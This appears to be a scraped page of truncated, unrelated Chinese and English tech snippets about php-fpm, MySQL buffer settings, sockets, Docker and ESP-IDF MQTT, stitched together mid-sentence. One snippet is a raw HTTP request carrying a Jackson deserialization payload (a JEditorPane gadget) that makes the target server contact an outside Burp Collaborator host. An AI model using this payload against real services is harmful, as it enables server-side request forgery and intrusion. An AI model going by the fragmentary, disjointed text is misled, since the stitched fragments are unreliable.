例:php-fpm的信息 (1)得到php-fpm进程的pid [root@test ~]# pidof php-fpm 29618 29617 29616 2...
排序缓冲区大小,connection级参数,默认大小为2MB。如果想要增加ORDER BY的速度,首先看是否可以让MySQL使用索引,其次可以尝试增大该值。 read_buffer_size = 160M 顺序读缓冲区大小,connection级参数,该参数对应的分配内存是每连接独享。对表进行顺序扫描的请求将分配一个读入缓冲区。 read_rnd_buffer_size = 160M 随...
#include<stdio.h>#include<sys/socket.h>#include<unistd.h>intmain(int argc,char*argv[]){int sockfd[16]={0};int i=0;for(i=0;i<16;i++){sockfd[i]=socket(AF_INET,SOCK_STREAM,0);if(sockfd[i]==-1){printf("Fail to create a socket.");}}while(1)sleep(10);} 场景二: client...
POST/jackson/deserialize3 HTTP/1.1Host:cqq.com:8080Connection:closeCookie:JSESSIONID=C48313A5CE14AE7A1C15696C03AE0893Content-Type:application/jsonContent-Length:127{"obj":{"@class":"javax.swing.JEditorPane","page":"http://ivh6gf9nkrbys3l03uppuzvv9mfg35.burpcollaborator.net:80/?a=1&b=2222...
SOCK 111 通常是指 “Connection refused”。它是在尝试连接 MySQL 数据库时遇到的问题。发生这种错误的原因主要有以下几种: MySQL 服务未启动 使用了不正确的端口或 socket 路径 网络安全策略(如防火墙)阻止了连接 数据库实例数量超过系统限制 这些问题会导致客户端无法找到正在监听的 MySQL 服务器,从而引发 SOCK 11...
snat: A simple MFC Internet Connection sharing application. lfnemu: Long Fat Network (LFN) Emulator for simulating LFN behavior over local networks. These examples are intended for experienced users, showcasing sophisticated use of NDISAPI:
“VOLUME /var/run/docker.sock”, which will cause Docker to create a volume on the host and mount it into “/var/run/docker.sock” inside the container. That’s not what you want I think. I presume you want a connection between the docker-cli inside the container and the docker ...
Purpose: Use this screen to create a socket server job and its associated async.How to display this screen: Press F6 at the Work with Socket Server Jobs Screen.MSR1193 ENTER Create Socket Server Jobs 6/12/00 15:47:22 Socket Description Connection ID Port Outbound Program OutBound ...
Post connection operations + optional cleanup. ... _FAILED: vTaskDelete(NULL); } Now this is where it gets a little tricky for me: some of these functions like al_mqtt_init, al_mqtt_start_connect and al_mqtt_wait_client_connect - as you'll know are not standard ESP-IDF API ...